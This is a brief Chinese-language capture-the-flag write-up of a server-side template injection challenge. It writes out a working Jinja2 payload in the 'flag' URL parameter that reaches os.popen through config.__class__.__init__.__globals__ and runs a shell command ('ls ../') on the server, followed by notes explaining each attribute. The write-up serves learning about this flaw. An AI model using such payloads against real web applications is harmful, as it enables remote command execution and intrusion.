打開題目,看到還是SSTI漏洞,
首先還是讓我們使用flag構造參數,所以就是?flag={{XXXX}},再看了一下config
看了一下,沒見什么特殊的東西,題目說了時SSIT漏洞,那么利用漏洞先ls查看一下
/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}
##__class__:用來查看變量所屬的類,根據前面的變量形式可以得到其所屬的類。
##__init__ 初始化類,返回的類型是function
##__globals__[] 使用方式是 函數名.__globals__獲取function所處空間下可使用的module、方法以及所有變量。
##os.popen() 方法用於從一個命令打開一個管道。
##open() 方法用於打開一個文件,並返回文件對象